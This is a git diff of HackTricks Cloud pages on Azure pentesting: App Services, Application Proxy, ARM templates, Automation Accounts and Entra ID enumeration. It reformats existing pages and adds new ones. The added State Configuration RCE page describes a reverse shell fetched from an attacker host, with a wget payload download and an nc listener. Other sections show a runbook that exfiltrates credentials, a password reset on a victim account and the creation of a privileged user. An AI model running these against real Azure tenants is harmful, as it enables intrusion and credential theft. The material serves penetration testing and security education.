diff --git a/pentesting-cloud/azure-security/az-services/az-app-services.md b/src/pentesting-cloud/azure-security/az-services/az-app-service.md similarity index 66% rename from pentesting-cloud/azure-security/az-services/az-app-services.md rename to src/pentesting-cloud/azure-security/az-services/az-app-service.md index c8d1139dc..8bd86e5eb 100644 --- a/pentesting-cloud/azure-security/az-services/az-app-services.md +++ b/src/pentesting-cloud/azure-security/az-services/az-app-service.md @@ -1,19 +1,6 @@ # Az - App Services -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## App Service Basic Information @@ -21,12 +8,11 @@ Azure App Services enables developers to **build, deploy, and scale web applicat Each app runs inside a sandbox but isolation depends upon App Service plans -* Apps in Free and Shared tiers run on shared VMs -* Apps in Standard and Premium tiers run on dedicated VMs +- Apps in Free and Shared tiers run on shared VMs +- Apps in Standard and Premium tiers run on dedicated VMs -{% hint style="warning" %} -Note that **none** of those isolations **prevents** other common **web vulnerabilities** (such as file upload, or injections). And if a **management identity** is used, it could be able to **esalate privileges to them**. -{% endhint %} +> [!WARNING] +> Note that **none** of those isolations **prevents** other common **web vulnerabilities** (such as file upload, or injections). And if a **management identity** is used, it could be able to **esalate privileges to them**. ### Azure Function Apps @@ -39,7 +25,7 @@ Actually some of the **security related features** App services use (`webapp` in When creating a web app (and a Azure function usually) it's possible to indicate if you want Basic Authentication to be enabled. This basically **enables SCM and FTP** for the application so it'll be possible to deploy the application using those technologies.\ Moreover in order to connect to them, Azure provides an **API that allows to get the username, password and URL** to connect to the SCM and FTP servers. -* Authentication: az webapp auth show --name lol --resource-group lol\_group +- Authentication: az webapp auth show --name lol --resource-group lol_group SSH @@ -49,9 +35,9 @@ Debugging ### Enumeration -{% tabs %} -{% tab title="az" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="az" }} + ```bash # List webapps az webapp list 
@@ -82,7 +68,7 @@ az webapp config appsettings list --name --resource-group az webapp config backup list --webapp-name --resource-group # Get backups scheduled for a webapp -az webapp config backup show --webapp-name --resource-group +az webapp config backup show --webapp-name --resource-group # Get snapshots az webapp config snapshot list --resource-group -n @@ -105,7 +91,6 @@ az webapp config storage-account list --name --resource-gl_group - # List all the functions az functionapp list @@ -125,7 +110,7 @@ az functionapp deployment source show \ az functionapp config container show \ --name \ --resource-group - + # Get settings (and privesc to the sorage account) az functionapp config appsettings list --name --resource-group @@ -146,24 +131,26 @@ az rest --method GET \ curl "?code=" ## Python example curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=" -v - + # Get source code az rest --url "https://management.azure.com//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" ``` -{% endcode %} -{% endtab %} -{% tab title="Az Powershell" %} +{{#endtab }} + +{{#tab name="Az Powershell" }} + ```powershell # Get App Services and Function Apps Get-AzWebApp # Get only App Services Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"} ``` -{% endtab %} -{% tab title="az get all" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="az get all" }} + ```bash #!/bin/bash @@ -192,9 +179,9 @@ echo "$list_app_services" | while IFS=$'\t' read -r appServiceName group; do fi done ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} #### Obtain credentials & get access to the webapp code 
@@ -216,29 +203,12 @@ git clone 'https://:@name.scm.azurewebsites.net/repo-name.gi ## If you change the code and do a push, the app is automatically redeployed ``` - - -## Privilege Escalation - -{% content-ref url="../az-privilege-escalation/az-app-services-privesc.md" %} -[az-app-services-privesc.md](../az-privilege-escalation/az-app-services-privesc.md) -{% endcontent-ref %} +{{#ref}} +../az-privilege-escalation/az-app-services-privesc.md +{{#endref}} ## References -* [https://learn.microsoft.com/en-in/azure/app-service/overview](https://learn.microsoft.com/en-in/azure/app-service/overview) +- [https://learn.microsoft.com/en-in/azure/app-service/overview](https://learn.microsoft.com/en-in/azure/app-service/overview) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md b/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md
new file mode 100644
index 000000000..9e40a66c8
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md
@@ -0,0 +1,40 @@
+# Az - Application Proxy
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+[From the docs:](https://learn.microsoft.com/en-us/entra/identity/app-proxy/application-proxy)
+
+Azure Active Directory's Application Proxy provides **secure remote access to on-premises web applications**. After a **single sign-on to Azure AD**, users can access both **cloud** and **on-premises applications** through an **external URL** or an internal application portal.
+
+It works like this:
+
+
+ +1. After the user has accessed the application through an endpoint, the user is directed to the **Azure AD sign-in page**. +2. After a **successful sign-in**, Azure AD sends a **token** to the user's client device. +3. The client sends the token to the **Application Proxy service**, which retrieves the user principal name (UPN) and security principal name (SPN) from the token. **Application Proxy then sends the request to the Application Proxy connector**. +4. If you have configured single sign-on, the connector performs any **additional authentication** required on behalf of the user. +5. The connector sends the request to the **on-premises application**. +6. The **response** is sent through the connector and Application Proxy service **to the user**. + +## Enumeration + +```powershell +# Enumerate applications with application proxy configured +Get-AzureADApplication | %{try{Get-AzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}} + +# Get applications service principal +Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Name"} + +# Use the following ps1 script from https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/scripts/powershell-display-users-group-of-app +# to find users and groups assigned to the application. Pass the ObjectID of the Service Principal to it +Get-ApplicationProxyAssignedUsersAndGroups -ObjectId +``` + +## References + +- [https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy](https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md b/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md new file mode 100644 index 000000000..7ee051d41 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md 
@@ -0,0 +1,31 @@
+# Az - ARM Templates / Deployments
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) To implement **infrastructure as code for your Azure solutions**, use Azure Resource Manager templates (ARM templates). The template is a JavaScript Object Notation (**JSON**) file that **defines** the **infrastructure** and configuration for your project. The template uses declarative syntax, which lets you state what you intend to deploy without having to write the sequence of programming commands to create it. In the template, you specify the resources to deploy and the properties for those resources.
+
+### History
+
+If you can access it, you can have **info about resources** that are not present but might be deployed in the future. Moreover, if a **parameter** containing **sensitive info** was marked as "**String**" **instead** of "**SecureString**", it will be present in **clear-text**.
+
+## Search Sensitive Info
+
+Users with the permissions `Microsoft.Resources/deployments/read` and `Microsoft.Resources/subscriptions/resourceGroups/read` can **read the deployment history**.
+
+```powershell
+Get-AzResourceGroup
+Get-AzResourceGroupDeployment -ResourceGroupName
+
+# Export
+Save-AzResourceGroupDeploymentTemplate -ResourceGroupName -DeploymentName
+cat .json # search for hardcoded password
+cat | Select-String password
+```
+
+## References
+
+- [https://app.gitbook.com/s/5uvPQhxNCPYYTqpRwsuS/\~/changes/argKsv1NUBY9l4Pd28TU/pentesting-cloud/azure-security/az-services/az-arm-templates#references](az-arm-templates.md#references)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/az-automation-account/README.md b/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md similarity index 66% rename from pentesting-cloud/azure-security/az-services/az-automation-account/README.md rename to src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md index 8f2797903..6d80d497f 100644 --- a/pentesting-cloud/azure-security/az-services/az-automation-account/README.md +++ b/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md @@ -1,19 +1,6 @@ # Az - Automation Account -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Basic Information @@ -26,9 +13,8 @@ These are like "**scheduled tasks**" in Azure that will let you execute things ( When **Run as Account** is used, it creates an Azure AD **application** with self-signed certificate, creates a **service principal** and assigns the **Contributor** role for the account in the **current subscription** (a lot of privileges).\ Microsoft recommends using a **Managed Identity** for Automation Account. -{% hint style="warning" %} -This will be **removed on September 30, 2023 and changed for Managed Identities.** -{% endhint %} +> [!WARNING] +> This will be **removed on September 30, 2023 and changed for Managed Identities.** ## Runbooks & Jobs @@ -58,13 +44,12 @@ Therefore, if you can choose to run a **Runbook** in a **Windows Hybrid Worker** It's possible to abuse SC to run arbitrary scripts in the managed machines. -{% content-ref url="az-state-configuration-rce.md" %} -[az-state-configuration-rce.md](az-state-configuration-rce.md) -{% endcontent-ref %} +{{#ref}} +az-state-configuration-rce.md +{{#endref}} ## Enumeration -{% code overflow="wrap" %} ```powershell # Check user right for automation az extension add --upgrade -n automation @@ -95,11 +80,9 @@ Get-AzAutomationAccount | Get-AzAutomationPython3Package # List hybrid workers Get-AzAutomationHybridWorkerGroup -AutomationAccountName -ResourceGroupName ``` -{% endcode %} ### Create a Runbook -{% code overflow="wrap" %} ```powershell # Get the role of a user on the Automation account # Contributor or higher = Can create and execute Runbooks 
@@ -114,11 +97,9 @@ Publish-AzAutomationRunbook -RunbookName -AutomationAccountName < # Start the Runbook Start-AzAutomationRunbook -RunbookName -RunOn Workergroup1 -AutomationAccountName -ResourceGroupName -Verbose ``` -{% endcode %} ### Exfiltrate Creds & Variables defined in an Automation Account using a Run Book -{% code overflow="wrap" %} ```powershell # Change the crdentials & variables names and add as many as you need @' 
@@ -141,47 +122,45 @@ $start = Start-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $Au start-sleep 20 ($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summarynt ``` -{% endcode %} -{% hint style="info" %} -You could do the same thing modifying an existing Run Book, and from the web console. -{% endhint %} +> [!NOTE] +> You could do the same thing modifying an existing Run Book, and from the web console. ### Steps for Setting Up an Automated Highly Privileged User Creation #### 1. Initialize an Automation Account -* **Action Required:** Create a new Automation Account. -* **Specific Setting:** Ensure "Create Azure Run As account" is enabled. +- **Action Required:** Create a new Automation Account. +- **Specific Setting:** Ensure "Create Azure Run As account" is enabled. #### 2. Import and Set Up Runbook -* **Source:** Download the sample runbook from [MicroBurst GitHub Repository](https://github.com/NetSPI/MicroBurst). -* **Actions Required:** - * Import the runbook into the Automation Account. - * Publish the runbook to make it executable. - * Attach a webhook to the runbook, enabling external triggers. +- **Source:** Download the sample runbook from [MicroBurst GitHub Repository](https://github.com/NetSPI/MicroBurst). +- **Actions Required:** + - Import the runbook into the Automation Account. + - Publish the runbook to make it executable. + - Attach a webhook to the runbook, enabling external triggers. #### 3. Configure AzureAD Module -* **Action Required:** Add the AzureAD module to the Automation Account. -* **Additional Step:** Ensure all Azure Automation Modules are updated to their latest versions. +- **Action Required:** Add the AzureAD module to the Automation Account. +- **Additional Step:** Ensure all Azure Automation Modules are updated to their latest versions. #### 4. 
Permission Assignment -* **Roles to Assign:** - * User Administrator - * Subscription Owner -* **Target:** Assign these roles to the Automation Account for necessary privileges. +- **Roles to Assign:** + - User Administrator + - Subscription Owner +- **Target:** Assign these roles to the Automation Account for necessary privileges. #### 5. Awareness of Potential Access Loss -* **Note:** Be aware that configuring such automation might lead to losing control over the subscription. +- **Note:** Be aware that configuring such automation might lead to losing control over the subscription. #### 6. Trigger User Creation -* Trigger the webhook to create a new user by sending a POST request. -* Use the PowerShell script provided, ensuring to replace the `$uri` with your actual webhook URL and updating the `$AccountInfo` with the desired username and password. +- Trigger the webhook to create a new user by sending a POST request. +- Use the PowerShell script provided, ensuring to replace the `$uri` with your actual webhook URL and updating the `$AccountInfo` with the desired username and password. ```powershell $uri = "" 
@@ -192,21 +171,8 @@ $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body ## References -* [https://learn.microsoft.com/en-us/azure/automation/overview](https://learn.microsoft.com/en-us/azure/automation/overview) -* [https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview) -* [https://github.com/rootsecdev/Azure-Red-Team#runbook-automation](https://github.com/rootsecdev/Azure-Red-Team#runbook-automation) +- [https://learn.microsoft.com/en-us/azure/automation/overview](https://learn.microsoft.com/en-us/azure/automation/overview) +- [https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview) +- [https://github.com/rootsecdev/Azure-Red-Team#runbook-automation](https://github.com/rootsecdev/Azure-Red-Team#runbook-automation) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md b/src/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md
new file mode 100644
index 000000000..d63ab573e
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md
@@ -0,0 +1,65 @@
+# Az - State Configuration RCE
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+**Check the complete post in:** [**https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe**](https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe)
+
+### Summary of Remote Server (C2) Infrastructure Preparation and Steps
+
+#### Overview
+
+The process involves setting up a remote server infrastructure to host a modified Nishang `Invoke-PowerShellTcp.ps1` payload, named `RevPS.ps1`, designed to bypass Windows Defender. The payload is served from a Kali Linux machine with IP `40.84.7.74` using a simple Python HTTP server. The operation is executed through several steps:
+
+#### Step 1 — Create Files
+
+- **Files Required:** Two PowerShell scripts are needed:
+ 1. `reverse_shell_config.ps1`: A Desired State Configuration (DSC) file that fetches and executes the payload. It is obtainable from [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/reverse_shell_config.ps1).
+ 2. `push_reverse_shell_config.ps1`: A script to publish the configuration to the VM, available at [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/push_reverse_shell_config.ps1).
+- **Customization:** Variables and parameters in these files must be tailored to the user's specific environment, including resource names, file paths, and server/payload identifiers.
+
+#### Step 2 — Zip Configuration File
+
+- The `reverse_shell_config.ps1` is compressed into a `.zip` file, making it ready for transfer to the Azure Storage Account.
+
+```powershell
+Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip
+```
+
+#### Step 3 — Set Storage Context & Upload
+
+- The zipped configuration file is uploaded to a predefined Azure Storage container, azure-pentest, using Azure's Set-AzStorageBlobContent cmdlet.
+
+```powershell
+Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx
+```
+
+#### Step 4 — Prep Kali Box
+
+- The Kali server downloads the RevPS.ps1 payload from a GitHub repository.
+
+```bash
+wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
+```
+
+- The script is edited to specify the target Windows VM and port for the reverse shell.
+
+#### Step 5 — Publish Configuration File
+
+- The configuration file is executed, resulting in the reverse-shell script being deployed to the specified location on the Windows VM.
+
+#### Step 6 — Host Payload and Setup Listener
+
+- A Python SimpleHTTPServer is started to host the payload, along with a Netcat listener to capture incoming connections.
+
+```bash
+sudo python -m SimpleHTTPServer 80
+sudo nc -nlvp 443
+```
+
+- The scheduled task executes the payload, achieving SYSTEM-level privileges.
+
+#### Conclusion
+
+The successful execution of this process opens numerous possibilities for further actions, such as credential dumping or expanding the attack to multiple VMs. The guide encourages continued learning and creativity in the realm of Azure Automation DSC.
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/az-azuread.md b/src/pentesting-cloud/azure-security/az-services/az-azuread.md
similarity index 79%
rename from pentesting-cloud/azure-security/az-services/az-azuread.md
rename to src/pentesting-cloud/azure-security/az-services/az-azuread.md
index 5d2552550..3a5f6aeaf 100644
--- a/pentesting-cloud/azure-security/az-services/az-azuread.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-azuread.md
@@ -1,19 +1,6 @@ # Az - Entra ID (AzureAD) & Azure IAM -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information @@ -25,8 +12,9 @@ Key features of Azure AD involve **multi-factor authentication** and **condition ### **Connection** -{% tabs %} -{% tab title="az cli" %} +{{#tabs }} +{{#tab name="az cli" }} + ```bash az login #This will open the browser (if not use --use-device-code) az login -u -p #Specify user and password @@ -55,9 +43,11 @@ az find "vm" # Find vm commands az vm -h # Get subdomains az ad user list --query-examples # Get examples ``` -{% endtab %} -{% tab title="Mg" %} +{{#endtab }} + +{{#tab name="Mg" }} + ```powershell # Login Open browser Connect-MgGraph @@ -82,9 +72,11 @@ Connect-MgGraph -AccessToken $secureToken # Find commands Find-MgGraphCommand -command *Mg* ``` -{% endtab %} -{% tab title="Az PowerShell" %} +{{#endtab }} + +{{#tab name="Az PowerShell" }} + ```powershell Connect-AzAccount #Open browser # Using credentials @@ -114,10 +106,11 @@ Get-Command *azad* #Cmdlets for other Azure resources have the format *Az* Get-Command *az* ``` -{% endtab %} -{% tab title="Raw PS" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="Raw PS" }} + ```powershell #Using management $Token = 'eyJ0eXAi..' @@ -135,11 +128,11 @@ $RequestParams = @{ # Using graph Invoke-WebRequest -Uri "https://graph.windows.net/myorganization/users?api-version=1.6" -Headers @{Authorization="Bearer {0}" -f $Token} ``` -{% endcode %} -{% endtab %} -{% tab title="curl" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="curl" }} + ```bash # Request tokens to access endpoints # ARM 
@@ -148,11 +141,11 @@ curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017- # Vault curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER ``` -{% endcode %} -{% endtab %} -{% tab title="Azure AD" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="Azure AD" }} + ```powershell Connect-AzureAD #Open browser # Using credentials @@ -164,9 +157,9 @@ Connect-AzureAD -Credential $creds ## AzureAD cannot request tokens, but can use AADGraph and MSGraph tokens to connect Connect-AzureAD -AccountId test@corp.onmicrosoft.com -AadAccessToken $token ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} When you **login** via **CLI** into Azure with any program, you are using an **Azure Application** from a **tenant** that belongs to **Microsoft**. These Applications, like the ones you can create in your account, **have a client id**. You **won't be able to see all of them** in the **allowed applications lists** you can see in the console, **but they are allowed by default**. @@ -201,25 +194,28 @@ $token = Invoke-Authorize -Credential $credential ` ### Tenants -{% tabs %} -{% tab title="az cli" %} +{{#tabs }} +{{#tab name="az cli" }} + ```bash # List tenants az account tenant list ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ### Users For more information about Entra ID users check: -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} +{{#ref}} +../az-basic-information/ +{{#endref}} + +{{#tabs }} +{{#tab name="az cli" }} -{% tabs %} -{% tab title="az cli" %} ```bash # Enumerate users az ad user list --output table 
@@ -260,9 +256,11 @@ curl -X GET "https://graph.microsoft.com/beta/roleManagement/directory/roleDefin -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" | jq ``` -{% endtab %} -{% tab title="Azure AD" %} +{{#endtab }} + +{{#tab name="Azure AD" }} + ```powershell # Enumerate Users Get-AzureADUser -All $true @@ -298,9 +296,11 @@ Get-AzureADUser -ObjectId roygcain@defcorphq.onmicrosoft.com | Get-AzureADUserAp $userObj = Get-AzureADUser -Filter "UserPrincipalName eq 'bill@example.com'" Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where { $_.Id -eq $userObj.ObjectId } } ``` -{% endtab %} -{% tab title="Az PowerShell" %} +{{#endtab }} + +{{#tab name="Az PowerShell" }} + ```powershell # Enumerate users Get-AzADUser 
@@ -312,37 +312,37 @@ Get-AzADUser | ?{$_.Displayname -match "admin"} # Get roles assigned to a user Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} #### Change User Password -{% code overflow="wrap" %} ```powershell $password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText –Force (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@corp.onmicrosoft.com"}).ObjectId | Set- AzureADUserPassword -Password $password –Verbose ``` -{% endcode %} ### MFA & Conditional Access Policies It's highly recommended to add MFA to every user, however, some companies won't set it or might set it with a Conditional Access: The user will be **required MFA if** it logs in from an specific location, browser or **some condition**. These policies, if not configured correctly might be prone to **bypasses**. Check: -{% content-ref url="../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md" %} -[az-conditional-access-policies-mfa-bypass.md](../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) -{% endcontent-ref %} +{{#ref}} +../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md +{{#endref}} ### Groups For more information about Entra ID groups check: -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} +{{#ref}} +../az-basic-information/ +{{#endref}} + +{{#tabs }} +{{#tab name="az cli" }} -{% tabs %} -{% tab title="az cli" %} ```powershell # Enumerate groups az ad group list @@ -369,9 +369,11 @@ az role assignment list --include-groups --include-classic-administrators true - # To get Entra ID roles assigned check how it's done with users and use a group ID ``` -{% endtab %} -{% tab title="Azure AD" %} +{{#endtab }} + +{{#tab name="Azure AD" }} + ```powershell # Enumerate Groups Get-AzureADGroup -All $true 
@@ -382,7 +384,7 @@ Get-AzureADGroup -SearchString "admin" | fl #Groups starting by "admin" Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"} #Groups with the word "admin" # Get groups allowing dynamic membership Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'} -# All groups that are from Azure AD +# All groups that are from Azure AD Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null} # All groups that are synced from on-prem (note that security groups are not synced) Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null} @@ -397,9 +399,11 @@ Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember # Get Apps where a group has a role (role not shown) Get-AzureADGroup -ObjectId | Get-AzureADGroupAppRoleAssignment | fl * ``` -{% endtab %} -{% tab title="Az PowerShell" %} +{{#endtab }} + +{{#tab name="Az PowerShell" }} + ```powershell # Get all groups Get-AzADGroup 
@@ -413,38 +417,37 @@ Get-AzADGroupMember -GroupDisplayName # Get roles of group Get-AzRoleAssignment -ResourceGroupName ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} #### Add user to group Owners of the group can add new users to the group -{% code overflow="wrap" %} ```powershell Add-AzureADGroupMember -ObjectId -RefObjectId -Verbose ``` -{% endcode %} -{% hint style="warning" %} -Groups can be dynamic, which basically means that **if a user fulfil certain conditions it will be added to a group**. Of course, if the conditions are based in **attributes** a **user** can **control**, he could abuse this feature to **get inside other groups**.\ -Check how to abuse dynamic groups in the following page: -{% endhint %} +> [!WARNING] +> Groups can be dynamic, which basically means that **if a user fulfil certain conditions it will be added to a group**. Of course, if the conditions are based in **attributes** a **user** can **control**, he could abuse this feature to **get inside other groups**.\ +> Check how to abuse dynamic groups in the following page: -{% content-ref url="../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md" %} -[dynamic-groups.md](../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) -{% endcontent-ref %} +{{#ref}} +../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md +{{#endref}} ### Service Principals For more information about Entra ID service principals check: -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} +{{#ref}} +../az-basic-information/ +{{#endref}} + +{{#tabs }} +{{#tab name="az cli" }} -{% tabs %} -{% tab title="az cli" %} ```bash # Get Service Principals az ad sp list --all 
@@ -461,9 +464,11 @@ az ad sp list --show-mine # Get SPs with generated secret or certificate az ad sp list --query '[?length(keyCredentials) > `0` || length(passwordCredentials) > `0`].[displayName, appId, keyCredentials, passwordCredentials]' -o json ``` -{% endtab %} -{% tab title="Azure AD" %} +{{#endtab }} + +{{#tab name="Azure AD" }} + ```powershell # Get Service Principals Get-AzureADServicePrincipal -All $true @@ -482,9 +487,11 @@ Get-AzureADServicePrincipal -ObjectId | Get-AzureADServicePrincipalCreatedO Get-AzureADServicePrincipal | Get-AzureADServicePrincipalMembership Get-AzureADServicePrincipal -ObjectId | Get-AzureADServicePrincipalMembership |fl * ``` -{% endtab %} -{% tab title="Az PowerShell" %} +{{#endtab }} + +{{#tab name="Az PowerShell" }} + ```powershell # Get SPs Get-AzADServicePrincipal @@ -495,9 +502,11 @@ Get-AzADServicePrincipal | ?{$_.DisplayName -match "app"} # Get roles of a SP Get-AzRoleAssignment -ServicePrincipalName ``` -{% endtab %} -{% tab title="Raw" %} +{{#endtab }} + +{{#tab name="Raw" }} + ```powershell $Token = 'eyJ0eX..' $URI = 'https://graph.microsoft.com/v1.0/applications' @@ -510,12 +519,12 @@ $RequestParams = @{ } (Invoke-RestMethod @RequestParams).value ``` -{% endtab %} -{% endtabs %} -{% hint style="warning" %} -The Owner of a Service Principal can change its password. -{% endhint %} +{{#endtab }} +{{#endtabs }} + +> [!WARNING] +> The Owner of a Service Principal can change its password.
